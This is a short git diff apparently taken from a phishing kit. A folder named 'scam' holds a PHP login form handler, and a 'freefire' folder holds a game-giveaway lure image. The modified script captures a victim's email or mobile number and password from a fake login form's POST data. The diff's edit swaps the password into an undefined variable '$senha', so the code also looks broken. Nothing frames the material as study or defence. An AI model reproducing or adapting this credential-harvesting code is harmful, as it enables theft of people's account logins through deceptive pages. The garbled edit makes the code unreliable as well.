diff --git a/.Gray/freefire/free.jpg b/.Gray/freefire/free.jpg deleted file mode 100644 index 8d68faa..0000000 Binary files a/.Gray/freefire/free.jpg and /dev/null differ diff --git a/.Gray/freefire/free.png b/.Gray/freefire/free.png new file mode 100644 index 0000000..d2d307e Binary files /dev/null and b/.Gray/freefire/free.png differ diff --git a/.Gray/scam/login_form_mb.php b/.Gray/scam/login_form_mb.php index bf4a452..2a3b6d3 100644 --- a/.Gray/scam/login_form_mb.php +++ b/.Gray/scam/login_form_mb.php @@ -2,7 +2,7 @@ $email = test_input($_POST["email_mobile"]); $data['email_mobile']=$email; $pass = test_input($_POST["pass_mobile"]); -$data['pass_mobile']=$pass; +$data['pass_mobile']=$senha; header ('Location: '.htmlspecialchars($_SERVER["PHP_SELF"]));